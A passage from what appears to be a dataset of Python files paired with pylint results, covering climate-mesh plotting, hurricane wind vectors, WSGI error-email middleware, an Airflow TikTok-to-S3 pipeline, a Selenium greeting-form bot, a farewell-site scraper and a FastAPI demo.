22 ax1 = fig.add_subplot(1,1,1,projection=ccrs.PlateCarree())
23 levels = np.linspace(np.amin(data),np.amax(data),100)
24 cf = ax1.tricontourf(lon_grid,lat_grid,data,levels=levels,transform=ccrs.PlateCarree())
25 ax1.set_extent([0, 359.9, -90, 90], crs=ccrs.PlateCarree())
26 ax1.add_feature(cfeature.LAND, zorder=100)
27 ax1.add_feature(cfeature.LAKES, alpha=0.5, zorder=101)
28 ax1.add_feature(cfeature.COASTLINE, zorder=101)
29 ax1.set_title('interpolated data '+time.strip())
30 cbar = fig.colorbar(cf,ax=ax1)
31 cbar.set_label(var_label)
32
33 # Save figure
34 fig.tight_layout()
35 fig.savefig(var_abrev+'_'+str(i).zfill(4)+'.png',box_inches='tight')
36 plt.close()
37
38 #######################################################################
39 #######################################################################
40
41 if __name__ == '__main__':
42
43 grid_file = 'mesh.nc'
44 data_file = 'out.nc'
45
46 grid_nc = netCDF4.Dataset(grid_file,'r')
47 lon_grid = grid_nc.variables['lonCell'][:]*180.0/np.pi
48 lat_grid = grid_nc.variables['latCell'][:]*180.0/np.pi
49
50 data_nc = netCDF4.Dataset(data_file,'r')
51 u_data = data_nc.variables['windSpeedU'][:]
52 v_data = data_nc.variables['windSpeedV'][:]
53 p_data = data_nc.variables['atmosPressure'][:]
54 xtime = data_nc.variables['xtime'][:]
55
56 for i in range(u_data.shape[0]-1):
57
58 print('Plotting vel: '+str(i))
59
60 data = np.sqrt(np.square(u_data[i,:]) + np.square(v_data[i,:]))
61 time_ls = [x.decode("utf-8") for x in xtime[i]]
62 time = ''.join(time_ls)
63 plot_data(lon_grid,lat_grid,data,'velocity magnitude','vel',time)
64 plot_data(lon_grid,lat_grid,p_data[i,:],'atmospheric pressure','pres',time)
| 21 - warning: bad-indentation
22 - warning: bad-indentation
23 - warning: bad-indentation
24 - warning: bad-indentation
25 - warning: bad-indentation
26 - warning: bad-indentation
27 - warning: bad-indentation
28 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
31 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
43 - warning: bad-indentation
44 - warning: bad-indentation
46 - warning: bad-indentation
47 - warning: bad-indentation
48 - warning: bad-indentation
50 - warning: bad-indentation
51 - warning: bad-indentation
52 - warning: bad-indentation
53 - warning: bad-indentation
54 - warning: bad-indentation
56 - warning: bad-indentation
58 - warning: bad-indentation
60 - warning: bad-indentation
61 - warning: bad-indentation
62 - warning: bad-indentation
63 - warning: bad-indentation
64 - warning: bad-indentation
19 - refactor: too-many-arguments
19 - refactor: too-many-positional-arguments
19 - warning: redefined-outer-name
19 - warning: redefined-outer-name
19 - warning: redefined-outer-name
19 - warning: redefined-outer-name
35 - error: used-before-assignment
|
1 #!/usr/bin/env python
2 '''
3 name: define_base_mesh
4 authors: Phillip J. Wolfram
5
6 This function specifies the resolution for a coastal refined mesh for the CA coast from SF to LA for
7 Chris Jeffrey and Mark Galassi.
8 It contains the following resolution resgions:
9 1) a QU 120km global background resolution
10 2) 3km refinement region along the CA coast from SF to LA, with 30km transition region
11
12 '''
13 import numpy as np
14 import jigsaw_to_MPAS.coastal_tools as ct
15
16
17 def cellWidthVsLatLon():
18 km = 1000.0
19
20 params = ct.default_params
21
22 SFtoLA = {"include": [np.array([-124.0, -117.5, 34.2, 38.0])], # SF to LA
23 "exclude": [np.array([-122.1, -120.8, 37.7, 39.2])]} # SF Bay Delta
24
25 WestCoast = np.array([-136.0, -102.0, 22.0, 51])
26
27 print("****QU120 background mesh and 300m refinement from SF to LA****")
28 params["mesh_type"] = "QU"
29 params["dx_max_global"] = 120.0 * km
30 params["region_box"] = SFtoLA
31 params["plot_box"] = WestCoast
32 params["dx_min_coastal"] = 3.0 * km
33 params["trans_width"] = 100.0 * km
34 params["trans_start"] = 30.0 * km
35
36 cell_width, lon, lat = ct.coastal_refined_mesh(params)
37
38 return cell_width / 1000, lon, lat
| Clean Code: No Issues Detected
|
1 import math
2
3
4 class Velocities:
5
6 def __init__(self, vfe, vfn, vmax):
7 """
8 Initialize with the forward velocity components.
9 :param vfe: Eastward forward velocity (x-component in the Earth frame) in km/hr.
10 :param vfn: Northward forward velocity component (y-component in the Earth frame) in km/hr.
11 """
12 self.vf = []
13 self.vfmagn = []
14 self.xunitv = []
15 self.yunitv = []
16
17 self.set_vforward(vfe, vfn)
18 self.vmax = vmax
19
20 def set_vforward(self, vfe, vfn):
21 self.vf = [vfe, vfn]
22 self.vfmagn = math.sqrt(pow(vfe, 2) + pow(vfn, 2))
23 self.xunitv = [vfn/self.vfmagn, -vfe/self.vfmagn]
24 self.yunitv = [vfe/self.vfmagn, vfn/self.vfmagn]
25
26
27 def compute_wind_vector(self, vg, xe, yn):
28 """
29 Returns the velocity components [ve,vn] given the tangential gradient wind speed.
30 :param vg: The tangential (theta) gradient wind speed in the hurricane frame in km/hr.
31 :param xe: The eastern component of position relative to the local origin (the hurricane eye) in km.
32 :param yn: The northern component of position relative to the local origin (the hurricane eye) in km.
33 :return: [ve,vn] the eastward and nortward components of the wind velocity in the Earth frame in km/hr.
34 """
35 rmagn = math.sqrt(xe*xe + yn*yn)
36
37 costheta = (xe*self.xunitv[0] + yn*self.xunitv[1])/rmagn
38 sintheta = -(xe*self.xunitv[1] - yn*self.xunitv[0])/rmagn
39 theta_unitv = [-sintheta*self.xunitv[0]+costheta*self.yunitv[0],
40 -sintheta*self.xunitv[1]+costheta*self.yunitv[1]]
41 vgtheta = [theta_unitv[0]*vg, theta_unitv[1]*vg]
42 vfcorr = vg/self.vmax
43 ve = self.vf[0]*vfcorr + vgtheta[0]
44 vn = self.vf[1]*vfcorr + vgtheta[1]
45
46 return [ve, vn]
47
| Clean Code: No Issues Detected
|
1 name = "Tatiana"
2 print(name)
3
4 if 3 > 2:
5 print("It works!")
6 if 5 > 2:
7 print("5 is indeed greater than 2")
8 else:
9 print("5 is not greater than 2")
10 name = 'Tatiana'
11 if name == 'Ola':
12 print('Hey Ola!')
13 elif name == 'Tatiana':
14 print('Hey Tatiana!')
15 else:
16 print('Hey anonymous!')
17
18 def hi():
19 print('Hi there!')
20 print('How are you?')
21 hi ()
22 def hi(name):
23 print('Hi ' + name + '!')
24
25 hi("Tatiana")
26
| 5 - warning: bad-indentation
7 - warning: bad-indentation
9 - warning: bad-indentation
10 - warning: bad-indentation
19 - warning: bad-indentation
20 - warning: bad-indentation
4 - refactor: comparison-of-constants
6 - refactor: comparison-of-constants
22 - error: function-redefined
22 - warning: redefined-outer-name
|
1 import sys
2 from wsgiref.simple_server import make_server
3
4 sys.path.append('..')
5
6 from app import App
7 from smoke.exceptions import EmailExceptionMiddleware
8
9 def exception_func_1():
10 return exception_func_2()
11
12 def exception_func_2():
13 return exception_func_3()
14
15 def exception_func_3():
16 return 1 / 0
17
18
19 app = EmailExceptionMiddleware(
20 App(exception_func_1),
21 smoke_html=True,
22 to_address=[],
23 smtp_server='127.0.0.1'
24 )
25
26
27 server = make_server('127.0.0.1', 8000, app)
28 server.serve_forever()
| Clean Code: No Issues Detected
|
1 # -*- coding: utf-8 -*-
2
3
4 import sys
5 import traceback
6
7 class ExceptionMiddleware(object):
8 def __init__(self, wrap_app, smoke_html=False):
9 self.wrap_app = wrap_app
10 self.smoke_html = smoke_html
11
12 def __call__(self, environ, start_response):
13 try:
14 return self.wrap_app(environ, start_response)
15 except:
16 tb_exc = traceback.format_exc()
17 exc_info = sys.exc_info()
18 self.handle_exception(tb_exc, exc_info)
19 if not self.smoke_html:
20 raise
21
22 status = '500 Internal Server Error'
23 start_response(
24 status,
25 [('Content-Type', 'text/html')],
26 exc_info
27 )
28 tb_exc = tb_exc.replace('\n', '<br/>').replace(' ', ' ')
29 html = """<html>
30 <head><title>%s</title></head>
31 <body>
32 <h1>%s</h1>
33 <p>%s</p>
34 </body>
35 </html>
36 """ % (status, status, tb_exc)
37 return [html]
38
39 def handle_exception(self, tb_exc, exc_info):
40 raise NotImplementedError
41
42
43
44 class EmailExceptionMiddleware(ExceptionMiddleware):
45 """This is an Example, In production, It's better not send emails in sync mode.
46 Because sending emails maybe slow, this will block your web app.
47 So, the best practices is write your own EmailExceptionMiddleware,
48 In this class, It's handle_exception method not send mail directly,
49 You shoul use MQ, or something else.
50 """
51 def __init__(self,
52 wrap_app,
53 smoke_html=False,
54 from_address=None,
55 to_address=None,
56 smtp_server=None,
57 smtp_port=25,
58 smtp_username=None,
59 smtp_password=None,
60 mail_subject_prefix=None,
61 mail_template=None):
62 assert isinstance(to_address, (list, tuple)) and smtp_server is not None, "Email Config Error"
63 self.from_address = from_address
64 self.to_address = to_address
65 self.smtp_server = smtp_server
66 self.smtp_port = smtp_port
67 self.smtp_username = smtp_username
68 self.smtp_password = smtp_password
69 self.mail_subject_prefix = mail_subject_prefix
70 self.mail_template = mail_template
71
72 super(EmailExceptionMiddleware, self).__init__(wrap_app, smoke_html=smoke_html)
73
74
75 def handle_exception(self, tb_exc, exc_info):
76 from smoke.functional import send_mail
77 send_mail(
78 self.smtp_server,
79 self.smtp_port,
80 self.smtp_username,
81 self.smtp_password,
82 self.from_address,
83 self.to_address,
84 '{0} Error Occurred'.format(self.mail_subject_prefix if self.mail_subject_prefix else ''),
85 tb_exc,
86 'html'
87 )
88
| 7 - refactor: useless-object-inheritance
15 - warning: bare-except
44 - refactor: too-many-instance-attributes
51 - refactor: too-many-arguments
51 - refactor: too-many-positional-arguments
72 - refactor: super-with-arguments
44 - refactor: too-few-public-methods
|
1 from mail import send_mail
| 1 - warning: unused-import
|
1 class App(object):
2 def __init__(self, hook_func=None):
3 self.hook_func = hook_func
4
5 def __call__(self, environ, start_response):
6 html = """<html>
7 <body><table>{0}</table></body>
8 </html>"""
9
10 def _get_env(k, v):
11 return """<tr><td>{0}</td><td>{1}</td></tr>""".format(k, v)
12
13 env_table = ''.join( [_get_env(k, v) for k, v in sorted(environ.items())] )
14 html = html.format(env_table)
15
16 status = '200 OK'
17 headers = [
18 ('Content-Type', 'text/html'),
19 ('Content-Length', str(len(html)))
20 ]
21
22 start_response(status, headers)
23 if self.hook_func:
24 self.hook_func()
25 return [html]
26
27 if __name__ == '__main__':
28 from wsgiref.simple_server import make_server
29 app = App()
30 server = make_server('127.0.0.1', 8000, app)
31 server.handle_request()
| 1 - refactor: useless-object-inheritance
1 - refactor: too-few-public-methods
|
1 from datetime import timedelta, datetime
2 import json
3 import time
4 import os
5 import airflow
6 from urllib.request import urlopen
7 import pandas as pd
8 import http.client
9 import configparser
10
11 from airflow import DAG
12 from airflow.operators.bash_operator import BashOperator
13 from airflow.operators.dummy_operator import DummyOperator
14 from airflow.operators.python_operator import PythonOperator
15 from airflow.utils.dates import days_ago
16 import airflow.hooks.S3_hook
17 import boto3
18
19 s3 = boto3.resource('s3')
20
21 config = configparser.ConfigParser()
22 config.read(f"{os.path.expanduser('~')}/airflow/api.config")
23
24
25 def get_api_data():
26 print(os.getcwd())
27 conn = http.client.HTTPSConnection("tiktok.p.rapidapi.com")
28
29 headers = {
30 'x-rapidapi-key': config["rapidapi"]["API_RAPIDAPI_KEY"],
31 'x-rapidapi-host': "tiktok.p.rapidapi.com"
32 }
33
34 conn.request("GET", "/live/trending/feed", headers=headers)
35
36 res = conn.getresponse()
37 data = res.read()
38 json_data = json.loads(data.decode("utf-8"))
39 return json_data
40
41
42 def get_clean_data(**context):
43 video_data = []
44 author_data = []
45 media = context['task_instance'].xcom_pull(task_ids='get_data', key='return_value').get('media')
46 if media:
47 for item in media:
48 video_attr = (
49 item["video_id"],
50 item["create_time"],
51 item["description"],
52 item["video"]["playAddr"],
53 item['statistics']
54 )
55 author_attr = (
56 item['author']['nickname'],
57 item['author']['uniqueId'],
58 item['author']['followers'],
59 item['author']['heartCount'],
60 item['author']['videoCount']
61 )
62 video_data.append(video_attr)
63 author_data.append(author_attr)
64 author_df = pd.DataFrame(author_data, columns=('nickname', 'id', 'followers', 'heartCount', 'videoCount'))
65 video_df = pd.DataFrame(video_data, columns=('video_id', 'create_time', 'descriotion', 'playAddr', 'statistics'))
66 video_df["create_time"]= pd.to_datetime(video_df['create_time'].apply(lambda x: datetime.fromtimestamp(int(x))))
67 video_df.to_csv(f"{os.path.expanduser('~')}/airflow/data/video.csv", index=None)
68 author_df.to_csv(f"{os.path.expanduser('~')}/airflow/data/author.csv", index=None)
69
70 def upload_file_to_S3_with_hook(filename, key, bucket_name):
71 hook = airflow.hooks.S3_hook.S3Hook('aws_default')
72 hook.load_file(filename, key, bucket_name)
73
74
75 default_args = {
76 'owner': 'airflow',
77 'start_date': days_ago(5),
78 'email': ['airflow@my_first_dag.com'],
79 'email_on_failure': False,
80 'email_on_retry': False,
81 'retries': 1,
82 'retry_delay': timedelta(minutes=5),
83 }
84
85
86
87 with DAG(
88 'tiktok_dag',
89 default_args=default_args,
90 description='Our first DAG',
91 schedule_interval="*/2 * * * *",
92 ) as dag:
93 get_data = PythonOperator(
94 task_id='get_data',
95 python_callable=get_api_data,
96 dag=dag
97 )
98 clean_data = PythonOperator(
99 task_id='clean_data',
100 python_callable=get_clean_data,
101 dag=dag,
102 provide_context=True
103 )
104
105 s3_tasks = []
106
107 for file in [f"{os.path.expanduser('~')}/airflow/data/author.csv",
108 f"{os.path.expanduser('~')}/airflow/data/video.csv"]:
109 upload_to_S3_task = PythonOperator(
110 task_id=f'upload_to_S3_{file.split("/")[-1]}',
111 python_callable=upload_file_to_S3_with_hook,
112 op_kwargs={
113 'filename': file,
114 'key': f'{datetime.now().strftime("%Y-%b-%d/%H-%M")}-{file.split("/")[-1]}',
115 'bucket_name': f'tiktok-fun',
116 },
117 dag=dag)
118
119 s3_tasks.append(upload_to_S3_task)
120
121 opr_end = BashOperator(task_id='opr_end', bash_command='echo "Done"')
122
123
124 get_data >> clean_data >> s3_tasks >> opr_end
| 115 - warning: f-string-without-interpolation
124 - warning: pointless-statement
3 - warning: unused-import
6 - warning: unused-import
13 - warning: unused-import
|
1 #import libraries
2 from selenium import webdriver
3 from selenium.webdriver.common.by import By
4 import time
5 from datetime import datetime
6 import pandas as pd
7
8 #path for webdriver
9 driverpath = "PATH for your chromedriver"
10
11 #load data from csv file
12 df = pd.read_csv("si126_namelist.csv")
13 urllist = list(df[df.GSX == True].formlink)
14 namelist = list(df[df.GSX == True].nickname)
15
16
17 #sending mail merge
18
19 for i in range(len(urllist)):
20 #rest time from previous session
21 driver = webdriver.Chrome(driverpath)
22 time.sleep(3)
23
24 sending_url = driver.get(urllist[i])
25 send_to = namelist[i]
26
27 time.sleep(1)
28
29 sender_txt = "@sikawit"
30 greeting_txt = f"""Hi {send_to.strip()}!
31
32 ยินดีด้วยครับคุณหมอ ในที่สุดก็เดินทางมาถึงเส้นชัยที่ยากที่สุดทางหนึ่งละครับ (ซึ่งผมขอหนีไปก่อน 555) ขอให้หมอเป็นหมอที่ดีครับ หวังว่าคงได้เจอกัน (คงไม่ใช่ในฐานะคนไข้นะ) หากมีอะไรที่ให้ช่วยได้ก็บอกมาได้ครัชช
33
34 ยินดีอีกครั้งครับ
35 Sake
36
37 *****
38 Generated from a bot on {datetime.now().astimezone().strftime("%Y-%m-%d %H:%M:%S UTC%Z")}
39 Find out more at https://github.com/sikawit/FarewellSI126"""
40
41 sender_fill = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[2]/div[1]/div/div/div[2]/div/div[1]/div/div[1]/input')
42 sender_fill.send_keys(sender_txt)
43
44 greeting_fill = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[2]/div[2]/div/div/div[2]/div/div[1]/div[2]/textarea')
45 greeting_fill.send_keys(greeting_txt)
46
47 submit = driver.find_element_by_xpath('/html/body/div/div[2]/form/div[2]/div/div[3]/div[1]/div/div/span')
48 submit.click()
49
50 time.sleep(3)
51
52 driver.close()
53
54
| 3 - warning: unused-import
|
1 #import libraries
2 from bs4 import BeautifulSoup
3 from urllib.request import urlopen
4 import urllib.error
5 import pandas as pd
6
7 #define func to find subfolder
8 def find_folder(student_id: int):
9 if student_id < 1 :
10 return None
11 elif student_id <= 50 :
12 return "001-050"
13 elif student_id <= 100 :
14 return "051-100"
15 elif student_id <= 150 :
16 return "101-150"
17 elif student_id <= 200 :
18 return "151-200"
19 elif student_id <= 250 :
20 return "201-250"
21 elif student_id <= 300 :
22 return "251-300"
23 elif student_id <= 326 :
24 return "301-326"
25 else:
26 return None
27
28 # define func to get url
29 def url_si(student_id):
30 return f"https://sites.google.com/view/seniorfarewell2021/mirror/{find_folder(i)}/{i:03d}"
31
32
33 # create blank list to collect url and HTTP response code
34 urllist = list()
35 checkerlist = list()
36 for i in range(326 + 1):
37 urllist.append(url_si(i))
38 urllist[0] = ""
39
40
41 #check that each person is exist or not
42 for i in range(327):
43 try:
44 urlopen(url_si(i))
45 except urllib.error.HTTPError as e:
46 checkerlist.append(404)
47 else:
48 checkerlist.append(200)
49
50
51 # finding name and real google doc path
52 namelist = list()
53 formlist = list()
54 for i in range(327):
55 if checkerlist[i] == 200:
56 bsObj = BeautifulSoup(urlopen(urllist[i]))
57 title = bsObj.find("h1").getText()
58 gform = bsObj.find_all("a", href=True)[-2]['href']
59 namelist.append(title)
60 formlist.append(gform)
61 else:
62 namelist.append("NotFound 404")
63 formlist.append("404 Not Found")
64
65
66 #Check GSX, send to my high-school classmates
67 #Because of duplicated nickname, plz check manually
68
69 is_gsx = [False] * 327 #0 to 326 people in SI126 code
70
71 is_gsx[11] = True # Max
72 is_gsx[12] = True # Film
73 is_gsx[23] = True # Pea
74 is_gsx[26] = True # Poom
75 is_gsx[28] = True # Win Sukrit
76 is_gsx[33] = True # Krit Kitty
77 is_gsx[37] = True # Ball
78 is_gsx[59] = True # Ji
79 is_gsx[61] = True # Tong
80 is_gsx[104] = True # Now
81 is_gsx[130] = True # Pond
82 is_gsx[139] = True # Thames
83 is_gsx[142] = True # Win Nawin
84 is_gsx[147] = True # Jan
85 is_gsx[164] = True # Mhee
86 is_gsx[185] = True # Jane Glasses
87 is_gsx[200] = True # Ana
88 is_gsx[209] = True # Jane Juice
89 is_gsx[232] = True # Fangpao
90 is_gsx[277] = True # Guggug
91 is_gsx[285] = True # Ken Whale
92 is_gsx[290] = True # Bell Tao
93
94 #create pandas dataframe from lists
95 si126_df = pd.DataFrame({
96 'url': urllist,
97 'formlink':formlist,
98 'title' : namelist,
99 'status': checkerlist,
100 "GSX" : is_gsx
101 })
102
103
104 #save dataframe to csv
105 si126_df.to_csv("si126_namelist.csv")
106
107
108 #cleaning some minor texts manually!, add some missing names, strip texts, do on text editors
109
110
111 #read csv file after cleaning some dirts
112 si126_df = pd.read_csv("si126_namelist.csv")
113
114
115 #find his/her nickname
116 si126_df["nickname"] = si126_df.title.str.split(" ",expand = True,n=1)[0]
117
118
119 #export to csv again
120 si126_df.to_csv("si126_namelist.csv")
121
122
123
| 9 - refactor: no-else-return
8 - refactor: too-many-return-statements
29 - warning: unused-argument
34 - refactor: use-list-literal
35 - refactor: use-list-literal
44 - refactor: consider-using-with
52 - refactor: use-list-literal
53 - refactor: use-list-literal
56 - refactor: consider-using-with
|
1 from fastapi import FastAPI
2 from fastapi.responses import HTMLResponse as hr
3 from fastapi.responses import RedirectResponse as rr
4 from fastapi.responses import FileResponse
5
6 app = FastAPI()
7
8 file_path="TinDog-start-masrter2/index.html"
9
10 @app.get("/")
11 async def rout():
12 return FileResponse(file_path)
13
14
15
16 @app.get("/reshtml", response_class=hr)
17 async def rout():
18 return """<html>
19 <body><h1>fsdfdfs</h1></body>
20 </html>
21
22 """
23
24 @app.get("/item/{item}")
25 async def item(item):
26 return item
27
28 @app.get("/redirectex", response_class = rr)
29 async def redirect():
30 return "https://google.com/"
| 17 - error: function-redefined
25 - warning: redefined-outer-name
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.